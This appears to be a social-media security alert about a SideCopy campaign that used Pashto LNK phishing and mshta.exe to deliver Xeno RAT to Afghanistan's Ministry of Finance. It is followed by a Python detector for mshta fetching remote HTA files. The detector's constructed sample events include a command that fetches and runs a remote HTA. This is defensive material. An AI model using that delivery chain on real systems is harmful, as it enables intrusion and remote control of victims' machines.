VMTech

SideCopy targets Afghanistan's Ministry of Finance: Xeno RAT via LNK phishing in Pashto

Colleagues, an important cyber-security alert: in Operation XENOFISCAL, SideCopy targeted Afghanistan's Ministry of Finance by sending ZIP archives containing LNK files in Pashto.

Brief:
- The LNK invokes mshta.exe to fetch an HTA from a compromised domain.
- Xeno RAT 1.8.7 is deployed via a DLL loader, achieving persistence in the registry and enabling remote control.
- Capabilities include SOCKS5 tunneling, keylogging, screenshots, camera/microphone access and artifact removal.

Why it matters: the campaign demonstrates targeted attacks and fragile delivery chains, so attachment filtering and blocking mshta are critical.
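
One way to hunt for the LNK-to-mshta step from the brief, as an added example (not VMTech's code or any vendor's rule): it scans process-creation events for mshta being handed an http(s) URL. The field names follow Sysmon Event ID 1, and all sample events, hosts and paths are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events using Sysmon Event ID 1 field names.
# Hosts, paths and command lines are made up for illustration.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://files.example.org/docs/report.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c start "" MsHtA "hTTp://198.51.100.7/a.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\a\notes-about-mshta.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# mshta as a standalone token, any case, with or without ".exe".
MSHTA_TOKEN = re.compile(r"(?<![\w-])mshta(?:\.exe)?(?![\w-])", re.IGNORECASE)
# An http(s) URL argument: mshta is being asked to fetch remote content.
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"'<>]+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_remote_mshta(event):
    """Return a finding dict if the event shows mshta given a remote URL, else None."""
    cmd = event.get("CommandLine", "")
    is_mshta = basename(event.get("Image", "")) == "mshta.exe" or MSHTA_TOKEN.search(cmd)
    url = REMOTE_URL.search(cmd)
    if not (is_mshta and url):
        return None  # local HTA use or unrelated process
    # Heuristic: explorer.exe as parent is what a double-clicked shortcut produces.
    from_shell = basename(event.get("ParentImage", "")) == "explorer.exe"
    return {"host": urlparse(url.group(0)).hostname,
            "severity": "high" if from_shell else "medium",
            "command_line": cmd}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        finding = detect_remote_mshta(ev)
        if finding:
            print(finding["severity"], finding["host"], finding["command_line"])
```

The second constructed event (a local .hta opened from cmd.exe) is deliberately not flagged, which keeps the rule focused on remote fetches.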

What practices do you employ to defend against such chains?

#cybersecurity #phishing #XenoRAT #APT
